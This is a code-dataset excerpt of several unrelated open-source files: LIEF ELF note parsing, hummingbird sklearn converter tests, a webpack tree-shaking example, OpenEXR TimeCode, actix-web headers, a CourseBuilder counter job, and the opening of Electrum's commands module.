code stringlengths 1 25.8M | language stringclasses 18 values | source stringclasses 4 values | repo stringclasses 78 values | path stringlengths 0 268 |
|---|---|---|---|---|
/* Copyright 2017 - 2025 R. Thomas
* Copyright 2017 - 2025 Quarkslab
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "LIEF/ELF/hash.hpp"
#include "LIEF/ELF/NoteDetails/core/CoreAuxv.hpp"
#include "LIEF/Visitor.hpp"
#include "LIEF/iostream.hpp"
#include "LIEF/BinaryStream/SpanStream.hpp"
#include "frozen.hpp"
#include "spdlog/fmt/fmt.h"
#include "ELF/Structures.hpp"
namespace LIEF {
namespace ELF {
template<class ELF_T> inline result<uint64_t>
get_impl(CoreAuxv::TYPE type, const Note::description_t& desc) {
using Elf_Auxv = typename ELF_T::Elf_Auxv;
auto stream = SpanStream::from_vector(desc);
if (!stream) {
return make_error_code(get_error(stream));
}
while (*stream) {
auto auxv = stream->read<Elf_Auxv>();
if (!auxv) {
return make_error_code(lief_errors::not_found);
}
const auto atype = static_cast<CoreAuxv::TYPE>(auxv->a_type);
auto value = auxv->a_un.a_val;
if (atype == CoreAuxv::TYPE::END) {
return make_error_code(lief_errors::not_found);
}
if (atype == type) {
return static_cast<uint64_t>(value);
}
}
return make_error_code(lief_errors::not_found);
}
template<class ELF_T> inline std::map<CoreAuxv::TYPE, uint64_t>
get_values_impl(const Note::description_t& desc) {
using Elf_Auxv = typename ELF_T::Elf_Auxv;
auto stream = SpanStream::from_vector(desc);
if (!stream) {
return {};
}
std::map<CoreAuxv::TYPE, uint64_t> values;
while (*stream) {
auto auxv = stream->read<Elf_Auxv>();
if (!auxv) {
return values;
}
const auto atype = static_cast<CoreAuxv::TYPE>(auxv->a_type);
auto value = auxv->a_un.a_val;
if (atype == CoreAuxv::TYPE::END) {
return values;
}
values[atype] = static_cast<uint64_t>(value);
}
return values;
}
template<class ELF_T>
inline bool write_impl(Note::description_t& description,
const std::map<CoreAuxv::TYPE, uint64_t>& values)
{
using Elf_Auxv = typename ELF_T::Elf_Auxv;
using ptr_t = typename ELF_T::uint;
vector_iostream io;
io.reserve(values.size() * sizeof(Elf_Auxv));
for (const auto& [type, value] : values) {
// This will be added at the end
if (type == CoreAuxv::TYPE::END) {
continue;
}
io.write(static_cast<ptr_t>(type))
.write(static_cast<ptr_t>(value));
}
io.write(static_cast<ptr_t>(CoreAuxv::TYPE::END))
.write(static_cast<ptr_t>(0));
io.move(description);
return true;
}
result<uint64_t> CoreAuxv::get(TYPE type) const {
return class_ == Header::CLASS::ELF32 ?
get_impl<details::ELF32>(type, description_) :
get_impl<details::ELF64>(type, description_);
}
std::map<CoreAuxv::TYPE, uint64_t> CoreAuxv::values() const {
return class_ == Header::CLASS::ELF32 ?
get_values_impl<details::ELF32>(description_) :
get_values_impl<details::ELF64>(description_);
}
bool CoreAuxv::set(TYPE type, uint64_t value) {
std::map<TYPE, uint64_t> vals = values();
vals[type] = value;
return set(vals);
}
bool CoreAuxv::set(const std::map<TYPE, uint64_t>& values) {
return class_ == Header::CLASS::ELF32 ?
write_impl<details::ELF32>(description_, values) :
write_impl<details::ELF64>(description_, values);
}
void CoreAuxv::dump(std::ostream& os) const {
Note::dump(os);
const auto& aux_vals = values();
if (aux_vals.empty()) {
return;
}
os << '\n';
for (const auto& [type, val] : aux_vals) {
os << fmt::format(" {}: 0x{:08x}\n", to_string(type), val);
}
}
void CoreAuxv::accept(Visitor& visitor) const {
visitor.visit(*this);
}
const char* to_string(CoreAuxv::TYPE type) {
#define ENTRY(X) std::pair(CoreAuxv::TYPE::X, #X)
STRING_MAP enums2str {
ENTRY(END),
ENTRY(IGNORE_TY),
ENTRY(EXECFD),
ENTRY(PHDR),
ENTRY(PHENT),
ENTRY(PHNUM),
ENTRY(PAGESZ),
ENTRY(BASE),
ENTRY(FLAGS),
ENTRY(ENTRY),
ENTRY(NOTELF),
ENTRY(UID),
ENTRY(EUID),
ENTRY(GID),
ENTRY(EGID),
ENTRY(TGT_PLATFORM),
ENTRY(HWCAP),
ENTRY(CLKTCK),
ENTRY(FPUCW),
ENTRY(DCACHEBSIZE),
ENTRY(ICACHEBSIZE),
ENTRY(UCACHEBSIZE),
ENTRY(IGNOREPPC),
ENTRY(SECURE),
ENTRY(BASE_PLATFORM),
ENTRY(RANDOM),
ENTRY(HWCAP2),
ENTRY(EXECFN),
ENTRY(SYSINFO),
ENTRY(SYSINFO_EHDR),
};
#undef ENTRY
if (auto it = enums2str.find(type); it != enums2str.end()) {
return it->second;
}
return "UNKNOWN";
}
} // namespace ELF
} // namespace LIEF | cpp | github | https://github.com/nodejs/node | deps/LIEF/src/ELF/NoteDetails/core/CoreAuxv.cpp |
"""
Tests sklearn matrix decomposition converters
"""
import unittest
import warnings
import sys
from distutils.version import LooseVersion
import numpy as np
import torch
import sklearn
from sklearn.decomposition import FastICA, KernelPCA, PCA, TruncatedSVD
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_digits
import hummingbird.ml
class TestSklearnMatrixDecomposition(unittest.TestCase):
def _fit_model_pca(self, model, precompute=False):
data = load_digits()
X_train, X_test, y_train, y_test = train_test_split(data.data, data.target, test_size=0.2, random_state=42)
X_test = X_test.astype("float32")
if precompute:
# For precompute we use a linear kernel
model.fit(np.dot(X_train, X_train.T))
X_test = np.dot(X_test, X_train.T)
else:
model.fit(X_train)
torch_model = hummingbird.ml.convert(model, "torch")
self.assertTrue(torch_model is not None)
np.testing.assert_allclose(model.transform(X_test), torch_model.transform(X_test), rtol=1e-6, atol=2 * 1e-5)
# PCA n_components none
def test_pca_converter_none(self):
self._fit_model_pca(PCA(n_components=None))
# PCA n_componenets two
def test_pca_converter_two(self):
self._fit_model_pca(PCA(n_components=2))
# PCA n_componenets mle and whiten true
@unittest.skipIf(
LooseVersion(sklearn.__version__) < LooseVersion("0.23.2"),
reason="With Sklearn version < 0.23.2 returns ValueError: math domain error (https://github.com/scikit-learn/scikit-learn/issues/4441)",
)
def test_pca_converter_mle_whiten(self):
self._fit_model_pca(PCA(n_components="mle", whiten=True))
# PCA n_componenets mle and solver full
@unittest.skipIf(
LooseVersion(sklearn.__version__) < LooseVersion("0.23.2"),
reason="With Sklearn version < 0.23.2 returns ValueError: math domain error (https://github.com/scikit-learn/scikit-learn/issues/4441)",
)
def test_pca_converter_mle_full(self):
self._fit_model_pca(PCA(n_components="mle", svd_solver="full"))
# PCA n_componenets none and solver arpack
def test_pca_converter_none_arpack(self):
self._fit_model_pca(PCA(n_components=None, svd_solver="arpack"))
# PCA n_componenets none and solver randomized
def test_pca_converter_none_randomized(self):
self._fit_model_pca(PCA(n_components=None, svd_solver="randomized"))
# KernelPCA linear kernel
def test_kernel_pca_converter_linear(self):
self._fit_model_pca(KernelPCA(n_components=5, kernel="linear"))
# KernelPCA linear kernel with inverse transform
def test_kernel_pca_converter_linear_fit_inverse_transform(self):
self._fit_model_pca(KernelPCA(n_components=5, kernel="linear", fit_inverse_transform=True))
# KernelPCA poly kernel
def test_kernel_pca_converter_poly(self):
self._fit_model_pca(KernelPCA(n_components=5, kernel="poly", degree=2))
# KernelPCA poly kernel coef0
def test_kernel_pca_converter_poly_coef0(self):
self._fit_model_pca(KernelPCA(n_components=10, kernel="poly", degree=3, coef0=10))
# KernelPCA poly kernel with inverse transform
def test_kernel_pca_converter_poly_fit_inverse_transform(self):
self._fit_model_pca(KernelPCA(n_components=5, kernel="poly", degree=3, fit_inverse_transform=True))
# KernelPCA poly kernel
def test_kernel_pca_converter_rbf(self):
self._fit_model_pca(KernelPCA(n_components=5, kernel="rbf"))
# KernelPCA sigmoid kernel
def test_kernel_pca_converter_sigmoid(self):
self._fit_model_pca(KernelPCA(n_components=5, kernel="sigmoid"))
# KernelPCA cosine kernel
def test_kernel_pca_converter_cosine(self):
self._fit_model_pca(KernelPCA(n_components=5, kernel="cosine"))
# KernelPCA precomputed kernel
def test_kernel_pca_converter_precomputed(self):
self._fit_model_pca(KernelPCA(n_components=5, kernel="precomputed"), precompute=True)
# TODO: Fails on macos-latest Python 3.8 due to a sklearn bug.
# FastICA converter with n_components none
# def test_fast_ica_converter_none(self):
# self._fit_model_pca(FastICA(n_components=None))
# FastICA converter with n_components 3
def test_fast_ica_converter_3(self):
self._fit_model_pca(FastICA(n_components=3))
# FastICA converter with n_components 3 whiten
def test_fast_ica_converter_3_whiten(self):
self._fit_model_pca(FastICA(n_components=3, whiten=True))
# FastICA converter with n_components 3 deflation algorithm
def test_fast_ica_converter_3_deflation(self):
self._fit_model_pca(FastICA(n_components=3, algorithm="deflation"))
# FastICA converter with n_components 3 fun exp
def test_fast_ica_converter_3_exp(self):
self._fit_model_pca(FastICA(n_components=3, fun="exp"))
# FastICA converter with n_components 3 fun cube
def test_fast_ica_converter_3_cube(self):
self._fit_model_pca(FastICA(n_components=3, fun="cube"))
# FastICA converter with n_components 3 fun custom
def test_fast_ica_converter_3_custom(self):
def my_g(x):
return x ** 3, (3 * x ** 2).mean(axis=-1)
self._fit_model_pca(FastICA(n_components=3, fun=my_g))
# TruncatedSVD converter with n_components 3
def test_truncated_svd_converter_3(self):
self._fit_model_pca(TruncatedSVD(n_components=3))
# TruncatedSVD converter with n_components 3 algorithm arpack
def test_truncated_svd_converter_3_arpack(self):
self._fit_model_pca(TruncatedSVD(n_components=3, algorithm="arpack"))
if __name__ == "__main__":
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
# example.js
```javascript
const inc = require("./increment").increment;
var a = 1;
inc(a); // 2
```
# increment.js
```javascript
const add = require("./math").add;
exports.increment = function increment(val) {
return add(val, 1);
};
exports.incrementBy2 = function incrementBy2(val) {
return add(val, 2);
};
exports.decrement = function decrement(val) {
return add(val, 1);
};
```
# math.js
```javascript
exports.add = function add() {
var sum = 0,
i = 0,
args = arguments,
l = args.length;
while (i < l) {
sum += args[i++];
}
return sum;
};
exports.multiply = function multiply() {
var product = 0,
i = 0,
args = arguments,
l = args.length;
while (i < l) {
sum *= args[i++];
}
return sum;
};
```
# dist/output.js
```javascript
/******/ (() => { // webpackBootstrap
/******/ var __webpack_modules__ = ([
/* 0 */,
/* 1 */
/*!**********************!*\
!*** ./increment.js ***!
\**********************/
/*! default exports */
/*! export decrement [provided] [unused] [renamed to Kt] */
/*! export increment [provided] [used in main] [renamed to GV] */
/*! export incrementBy2 [provided] [unused] [renamed to Bd] */
/*! runtime requirements: __webpack_require__, __webpack_exports__ */
/***/ ((__unused_webpack_module, exports, __webpack_require__) => {
var __webpack_unused_export__;
const add = (__webpack_require__(/*! ./math */ 2)/* .add */ .W);
exports.GV = function increment(val) {
return add(val, 1);
};
__webpack_unused_export__ = function incrementBy2(val) {
return add(val, 2);
};
__webpack_unused_export__ = function decrement(val) {
return add(val, 1);
};
/***/ }),
/* 2 */
/*!*****************!*\
!*** ./math.js ***!
\*****************/
/*! default exports */
/*! export add [provided] [used in main] [renamed to W] */
/*! export multiply [provided] [unused] [renamed to l] */
/*! runtime requirements: __webpack_exports__ */
/***/ ((__unused_webpack_module, exports) => {
var __webpack_unused_export__;
exports.W = function add() {
var sum = 0,
i = 0,
args = arguments,
l = args.length;
while (i < l) {
sum += args[i++];
}
return sum;
};
__webpack_unused_export__ = function multiply() {
var product = 0,
i = 0,
args = arguments,
l = args.length;
while (i < l) {
sum *= args[i++];
}
return sum;
};
/***/ })
/******/ ]);
```
<details><summary><code>/* webpack runtime code */</code></summary>
``` js
/************************************************************************/
/******/ // The module cache
/******/ var __webpack_module_cache__ = {};
/******/
/******/ // The require function
/******/ function __webpack_require__(moduleId) {
/******/ // Check if module is in cache
/******/ var cachedModule = __webpack_module_cache__[moduleId];
/******/ if (cachedModule !== undefined) {
/******/ return cachedModule.exports;
/******/ }
/******/ // Check if module exists (development only)
/******/ if (__webpack_modules__[moduleId] === undefined) {
/******/ var e = new Error("Cannot find module '" + moduleId + "'");
/******/ e.code = 'MODULE_NOT_FOUND';
/******/ throw e;
/******/ }
/******/ // Create a new module (and put it into the cache)
/******/ var module = __webpack_module_cache__[moduleId] = {
/******/ // no module.id needed
/******/ // no module.loaded needed
/******/ exports: {}
/******/ };
/******/
/******/ // Execute the module function
/******/ __webpack_modules__[moduleId](module, module.exports, __webpack_require__);
/******/
/******/ // Return the exports of the module
/******/ return module.exports;
/******/ }
/******/
/************************************************************************/
```
</details>
``` js
var __webpack_exports__ = {};
// This entry needs to be wrapped in an IIFE because it needs to be isolated against other modules in the chunk.
(() => {
/*!********************!*\
!*** ./example.js ***!
\********************/
/*! unknown exports (runtime-defined) */
/*! runtime requirements: __webpack_require__ */
const inc = (__webpack_require__(/*! ./increment */ 1)/* .increment */ .GV);
var a = 1;
inc(a); // 2
})();
/******/ })()
;
```
# dist/output.js (production)
```javascript
/*! For license information please see output.js.LICENSE.txt */
(()=>{var r=[,(r,n,o)=>{const t=o(2).W;n.GV=function(r){return t(r,1)}},(r,n)=>{n.W=function(){for(var r=0,n=0,o=arguments,t=o.length;n<t;)r+=o[n++];return r}}],n={};(0,function o(t){var e=n[t];if(void 0!==e)return e.exports;if(void 0===r[t]){var i=new Error("Cannot find module '"+t+"'");throw i.code="MODULE_NOT_FOUND",i}var u=n[t]={exports:{}};return r[t](u,u.exports,o),u.exports}(1).GV)(1)})();
```
# dist/without.js (same without tree shaking)
```javascript
/*! For license information please see without.js.LICENSE.txt */
(()=>{var r=[,(r,n,t)=>{const e=t(2).add;n.increment=function(r){return e(r,1)},n.incrementBy2=function(r){return e(r,2)},n.decrement=function(r){return e(r,1)}},(r,n)=>{n.add=function(){for(var r=0,n=0,t=arguments,e=t.length;n<e;)r+=t[n++];return r},n.multiply=function(){for(var r=0,n=arguments,t=n.length;r<t;)sum*=n[r++];return sum}}],n={};(0,function t(e){var o=n[e];if(void 0!==o)return o.exports;if(void 0===r[e]){var u=new Error("Cannot find module '"+e+"'");throw u.code="MODULE_NOT_FOUND",u}var i=n[e]={exports:{}};return r[e](i,i.exports,t),i.exports}(1).increment)(1)})();
```
# Info
## Unoptimized
```
asset output.js 3.2 KiB [emitted] (name: main)
chunk (runtime: main) output.js (main) 634 bytes [entry] [rendered]
> ./example.js main
dependent modules 564 bytes [dependent] 2 modules
./example.js 70 bytes [built] [code generated]
[no exports used]
entry ./example.js main
webpack X.X.X compiled successfully
asset without.js 3.34 KiB [emitted] (name: main)
chunk (runtime: main) without.js (main) 634 bytes [entry] [rendered]
> ./example.js main
dependent modules 564 bytes [dependent] 2 modules
./example.js 70 bytes [built] [code generated]
[used exports unknown]
entry ./example.js main
webpack X.X.X compiled successfully
```
## Production mode
```
asset output.js 463 bytes [emitted] [minimized] (name: main) 1 related asset
chunk (runtime: main) output.js (main) 634 bytes [entry] [rendered]
> ./example.js main
dependent modules 564 bytes [dependent] 2 modules
./example.js 70 bytes [built] [code generated]
[no exports used]
entry ./example.js main
webpack X.X.X compiled successfully
asset without.js 649 bytes [emitted] [minimized] (name: main) 1 related asset
chunk (runtime: main) without.js (main) 634 bytes [entry] [rendered]
> ./example.js main
dependent modules 564 bytes [dependent] 2 modules
./example.js 70 bytes [built] [code generated]
[used exports unknown]
entry ./example.js main
webpack X.X.X compiled successfully
``` | unknown | github | https://github.com/webpack/webpack | examples/cjs-tree-shaking/README.md |
///////////////////////////////////////////////////////////////////////////
//
// Copyright (c) 2004, Industrial Light & Magic, a division of Lucas
// Digital Ltd. LLC
//
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Industrial Light & Magic nor the names of
// its contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
///////////////////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------------
//
// class TimeCode
//
//-----------------------------------------------------------------------------
#include <ImfTimeCode.h>
#include "Iex.h"
#include "ImfNamespace.h"
OPENEXR_IMF_INTERNAL_NAMESPACE_SOURCE_ENTER
TimeCode::TimeCode ()
{
_time = 0;
_user = 0;
}
TimeCode::TimeCode
(int hours,
int minutes,
int seconds,
int frame,
bool dropFrame,
bool colorFrame,
bool fieldPhase,
bool bgf0,
bool bgf1,
bool bgf2,
int binaryGroup1,
int binaryGroup2,
int binaryGroup3,
int binaryGroup4,
int binaryGroup5,
int binaryGroup6,
int binaryGroup7,
int binaryGroup8)
{
setHours (hours);
setMinutes (minutes);
setSeconds (seconds);
setFrame (frame);
setDropFrame (dropFrame);
setColorFrame (colorFrame);
setFieldPhase (fieldPhase);
setBgf0 (bgf0);
setBgf1 (bgf1);
setBgf2 (bgf2);
setBinaryGroup (1, binaryGroup1);
setBinaryGroup (2, binaryGroup2);
setBinaryGroup (3, binaryGroup3);
setBinaryGroup (4, binaryGroup4);
setBinaryGroup (5, binaryGroup5);
setBinaryGroup (6, binaryGroup6);
setBinaryGroup (7, binaryGroup7);
setBinaryGroup (8, binaryGroup8);
}
TimeCode::TimeCode
(unsigned int timeAndFlags,
unsigned int userData,
Packing packing)
{
setTimeAndFlags (timeAndFlags, packing);
setUserData (userData);
}
TimeCode::TimeCode (const TimeCode &other)
{
_time = other._time;
_user = other._user;
}
TimeCode &
TimeCode::operator = (const TimeCode &other)
{
_time = other._time;
_user = other._user;
return *this;
}
bool
TimeCode::operator == (const TimeCode & c) const
{
return (_time == c._time && _user == c._user);
}
bool
TimeCode::operator != (const TimeCode & c) const
{
return (_time != c._time || _user != c._user);
}
namespace {
unsigned int
bitField (unsigned int value, int minBit, int maxBit)
{
int shift = minBit;
unsigned int mask = (~(~0U << (maxBit - minBit + 1)) << minBit);
return (value & mask) >> shift;
}
void
setBitField (unsigned int &value, int minBit, int maxBit, unsigned int field)
{
int shift = minBit;
unsigned int mask = (~(~0U << (maxBit - minBit + 1)) << minBit);
value = ((value & ~mask) | ((field << shift) & mask));
}
int
bcdToBinary (unsigned int bcd)
{
return int ((bcd & 0x0f) + 10 * ((bcd >> 4) & 0x0f));
}
unsigned int
binaryToBcd (int binary)
{
int units = binary % 10;
int tens = (binary / 10) % 10;
return (unsigned int) (units | (tens << 4));
}
} // namespace
int
TimeCode::hours () const
{
return bcdToBinary (bitField (_time, 24, 29));
}
void
TimeCode::setHours (int value)
{
if (value < 0 || value > 23)
throw IEX_NAMESPACE::ArgExc ("Cannot set hours field in time code. "
"New value is out of range.");
setBitField (_time, 24, 29, binaryToBcd (value));
}
int
TimeCode::minutes () const
{
return bcdToBinary (bitField (_time, 16, 22));
}
void
TimeCode::setMinutes (int value)
{
if (value < 0 || value > 59)
throw IEX_NAMESPACE::ArgExc ("Cannot set minutes field in time code. "
"New value is out of range.");
setBitField (_time, 16, 22, binaryToBcd (value));
}
int
TimeCode::seconds () const
{
return bcdToBinary (bitField (_time, 8, 14));
}
void
TimeCode::setSeconds (int value)
{
if (value < 0 || value > 59)
throw IEX_NAMESPACE::ArgExc ("Cannot set seconds field in time code. "
"New value is out of range.");
setBitField (_time, 8, 14, binaryToBcd (value));
}
int
TimeCode::frame () const
{
return bcdToBinary (bitField (_time, 0, 5));
}
void
TimeCode::setFrame (int value)
{
if (value < 0 || value > 59)
throw IEX_NAMESPACE::ArgExc ("Cannot set frame field in time code. "
"New value is out of range.");
setBitField (_time, 0, 5, binaryToBcd (value));
}
bool
TimeCode::dropFrame () const
{
return !!bitField (_time, 6, 6);
}
void
TimeCode::setDropFrame (bool value)
{
setBitField (_time, 6, 6, (unsigned int) !!value);
}
bool
TimeCode::colorFrame () const
{
return !!bitField (_time, 7, 7);
}
void
TimeCode::setColorFrame (bool value)
{
setBitField (_time, 7, 7, (unsigned int) !!value);
}
bool
TimeCode::fieldPhase () const
{
return !!bitField (_time, 15, 15);
}
void
TimeCode::setFieldPhase (bool value)
{
setBitField (_time, 15, 15, (unsigned int) !!value);
}
bool
TimeCode::bgf0 () const
{
return !!bitField (_time, 23, 23);
}
void
TimeCode::setBgf0 (bool value)
{
setBitField (_time, 23, 23, (unsigned int) !!value);
}
bool
TimeCode::bgf1 () const
{
return!!bitField (_time, 30, 30);
}
void
TimeCode::setBgf1 (bool value)
{
setBitField (_time, 30, 30, (unsigned int) !!value);
}
bool
TimeCode::bgf2 () const
{
return !!bitField (_time, 31, 31);
}
void
TimeCode::setBgf2 (bool value)
{
setBitField (_time, 31, 31, (unsigned int) !!value);
}
int
TimeCode::binaryGroup (int group) const
{
if (group < 1 || group > 8)
throw IEX_NAMESPACE::ArgExc ("Cannot extract binary group from time code "
"user data. Group number is out of range.");
int minBit = 4 * (group - 1);
int maxBit = minBit + 3;
return int (bitField (_user, minBit, maxBit));
}
void
TimeCode::setBinaryGroup (int group, int value)
{
if (group < 1 || group > 8)
throw IEX_NAMESPACE::ArgExc ("Cannot extract binary group from time code "
"user data. Group number is out of range.");
int minBit = 4 * (group - 1);
int maxBit = minBit + 3;
setBitField (_user, minBit, maxBit, (unsigned int) value);
}
unsigned int
TimeCode::timeAndFlags (Packing packing) const
{
if (packing == TV50_PACKING)
{
unsigned int t = _time;
t &= ~((1 << 6) | (1 << 15) | (1 << 23) | (1 << 30) | (1 << 31));
t |= ((unsigned int) bgf0() << 15);
t |= ((unsigned int) bgf2() << 23);
t |= ((unsigned int) bgf1() << 30);
t |= ((unsigned int) fieldPhase() << 31);
return t;
}
if (packing == FILM24_PACKING)
{
return _time & ~((1 << 6) | (1 << 7));
}
else // packing == TV60_PACKING
{
return _time;
}
}
void
TimeCode::setTimeAndFlags (unsigned int value, Packing packing)
{
if (packing == TV50_PACKING)
{
_time = value &
~((1 << 6) | (1 << 15) | (1 << 23) | (1 << 30) | (1 << 31));
if (value & (1 << 15))
setBgf0 (true);
if (value & (1 << 23))
setBgf2 (true);
if (value & (1 << 30))
setBgf1 (true);
if (value & (1 << 31))
setFieldPhase (true);
}
else if (packing == FILM24_PACKING)
{
_time = value & ~((1 << 6) | (1 << 7));
}
else // packing == TV60_PACKING
{
_time = value;
}
}
unsigned int
TimeCode::userData () const
{
return _user;
}
void
TimeCode::setUserData (unsigned int value)
{
_user = value;
}
OPENEXR_IMF_INTERNAL_NAMESPACE_SOURCE_EXIT | cpp | github | https://github.com/opencv/opencv | 3rdparty/openexr/IlmImf/ImfTimeCode.cpp |
import React from "react";
import { formatRelative, subDays } from "date-fns";
const Component = ({ locale }) => (
<div style={{ border: "5px solid darkred" }}>
<p>I'm a Component exposed from container C!</p>
<p>
Using date-fn in Remote:{" "}
{formatRelative(subDays(new Date(), 3), new Date(), { locale })}
</p>
</div>
);
export default Component; | javascript | github | https://github.com/webpack/webpack | examples/module-federation/src-c/Component.js |
//! A Collection of Header implementations for common HTTP Headers.
//!
//! ## Mime Types
//! Several header fields use MIME values for their contents. Keeping with the strongly-typed theme,
//! the [mime] crate is used in such headers as [`ContentType`] and [`Accept`].
use std::fmt;
// re-export from actix-http
// - header name / value types
// - relevant traits for converting to header name / value
// - all const header names
// - header map
// - the few typed headers from actix-http
// - header parsing utils
pub use actix_http::header::*;
use bytes::{Bytes, BytesMut};
mod accept;
mod accept_charset;
mod accept_encoding;
mod accept_language;
mod allow;
mod cache_control;
mod content_disposition;
mod content_language;
mod content_length;
mod content_range;
mod content_type;
mod date;
mod encoding;
mod entity;
mod etag;
mod expires;
mod if_match;
mod if_modified_since;
mod if_none_match;
mod if_range;
mod if_unmodified_since;
mod last_modified;
mod macros;
mod preference;
mod range;
#[cfg(test)]
pub(crate) use self::macros::common_header_test;
pub(crate) use self::macros::{common_header, common_header_test_module};
pub use self::{
accept::Accept,
accept_charset::AcceptCharset,
accept_encoding::AcceptEncoding,
accept_language::AcceptLanguage,
allow::Allow,
cache_control::{CacheControl, CacheDirective},
content_disposition::{ContentDisposition, DispositionParam, DispositionType},
content_language::ContentLanguage,
content_length::ContentLength,
content_range::{ContentRange, ContentRangeSpec},
content_type::ContentType,
date::Date,
encoding::Encoding,
entity::EntityTag,
etag::ETag,
expires::Expires,
if_match::IfMatch,
if_modified_since::IfModifiedSince,
if_none_match::IfNoneMatch,
if_range::IfRange,
if_unmodified_since::IfUnmodifiedSince,
last_modified::LastModified,
preference::Preference,
range::{ByteRangeSpec, Range},
};
/// Format writer ([`fmt::Write`]) for a [`BytesMut`].
#[derive(Debug, Default)]
struct Writer {
buf: BytesMut,
}
impl Writer {
/// Constructs new bytes writer.
pub fn new() -> Writer {
Writer::default()
}
/// Splits bytes out of writer, leaving writer buffer empty.
pub fn take(&mut self) -> Bytes {
self.buf.split().freeze()
}
}
impl fmt::Write for Writer {
#[inline]
fn write_str(&mut self, s: &str) -> fmt::Result {
self.buf.extend_from_slice(s.as_bytes());
Ok(())
}
#[inline]
fn write_fmt(&mut self, args: fmt::Arguments<'_>) -> fmt::Result {
fmt::write(self, args)
}
} | rust | github | https://github.com/actix/actix-web | actix-web/src/http/header/mod.rs |
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Reporting of anonymized CourseBuilder usage statistics: count students."""
__author__ = [
'Michael Gainer (mgainer@google.com)',
]
from models import jobs
from models import models
from modules.usage_reporting import messaging
class StudentCounter(jobs.MapReduceJob):
"""M/R job to count students in the course."""
@staticmethod
def get_description():
return 'Count number of students in course. Used for usage reporting.'
def entity_class(self):
return models.Student
@staticmethod
def map(student):
# TODO - count: registered, unregistered, completed, certificated
yield (messaging.Message.METRIC_STUDENT_COUNT, 1)
@staticmethod
def combine(unused_key, values, previously_combined_outputs=None):
total = sum([int(value) for value in values])
if previously_combined_outputs is not None:
total += sum([int(value) for value in previously_combined_outputs])
yield total
@staticmethod
def reduce(key, values):
total = sum(int(value) for value in values)
messaging.Message.send_course_message(key, total)
yield key, total | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import datetime
import copy
import argparse
import json
import ast
import base64
from functools import wraps
from decimal import Decimal
from typing import Optional, TYPE_CHECKING
from .import util, ecc
from .util import bfh, bh2u, format_satoshis, json_decode, json_encode, is_hash256_str, is_hex_str, to_bytes
from . import bitcoin
from .bitcoin import is_address, hash_160, COIN, TYPE_ADDRESS
from .bip32 import BIP32Node
from .i18n import _
from .transaction import Transaction, multisig_script, TxOutput
from .paymentrequest import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .synchronizer import Notifier
from .wallet import Abstract_Wallet, create_new_wallet, restore_wallet_from_text
from .address_synchronizer import TX_HEIGHT_LOCAL
if TYPE_CHECKING:
from .network import Network
from .simple_config import SimpleConfig
known_commands = {}
def satoshis(amount):
# satoshi conversion must not be performed by the parser
return int(COIN*Decimal(amount)) if amount not in ['!', None] else amount
class Command:
def __init__(self, func, s):
self.name = func.__name__
self.requires_network = 'n' in s
self.requires_wallet = 'w' in s
self.requires_password = 'p' in s
self.description = func.__doc__
self.help = self.description.split('.')[0] if self.description else None
